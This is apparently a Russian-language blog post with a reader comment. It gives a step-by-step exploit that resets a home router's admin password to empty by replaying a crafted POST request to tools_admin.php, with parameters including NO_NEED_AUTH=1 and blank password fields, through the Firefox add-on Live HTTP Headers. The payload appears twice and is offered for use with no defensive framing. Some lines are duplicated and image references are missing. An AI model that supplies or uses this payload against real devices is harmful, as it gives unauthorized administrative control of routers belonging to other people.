Есть эксплойт, описан тут:
чтобы поменять пароль надо произвести POST запрос
по адресу:
http://192.168.0.1/tools_admin.php
с параметрами:
по адресу:
http://192.168.0.1/tools_admin.php
с параметрами:
ACTION_POST=1&apply=Save+Settings&admin_name=admin&admin_password1=&admin_password2=&grap_auth_enable_h=0&rt_enable_h=0&NO_NEED_AUTH=1&AUTH_GROUP=0
Здесь устанавливается пустой пароль для пользователя admin
Эту операцию можно произвести с помощью дополнения для firefox — live http headers
Эту операцию можно произвести с помощью дополнения для firefox — live http headers
Подробно и в картинках:
1) Скачиваем и устанавливаем браузер Mozilla Firefox здесь.
2) Скачиваем и устанавливаем дополнение для браузера Mozilla , которое называется Live HTTP Headers
здесь
здесь
3) Через браузер Mozilla Firefox заходим на адрес 192.168.0.1, страница должна выглядеть примерно так:
Страница входа в админ-панель роутера
4) Нажимаем alt на клавиатуре, в браузере появляется меню:
5) Выбираем Инструменты -> Просмотр HTTP заголовков
6) Появится окно:
6) В браузере нажимаем F5, переходим обратно к окну Просмотр HTTP заголовков, и видим примерно следующее:
7) Выбираем любую строку с адресом 192.168.0.1 и нажимаем кнопку повтор
В появившемся окне пишем адрес http://192.168.0.1/tools_admin.php, ставим галочку POST, вставляем
ACTION_POST=1&apply=Save+Settings&admin_name=admin&admin_password1=&admin_password2=&grap_auth_enable_h=0&rt_enable_h=0&NO_NEED_AUTH=1&AUTH_GROUP=0
Нажимаем кнопку
В браузере увидите следующее
9)Всё, пароль сброшен, теперь его нет.
Переходим обратно на 192.168.0.1, вводим имя пользователя Admin, пароль пустой, входим, радуемся
а если не 401 а 501 вылазиет тогда как быть ?
ОтветитьУдалить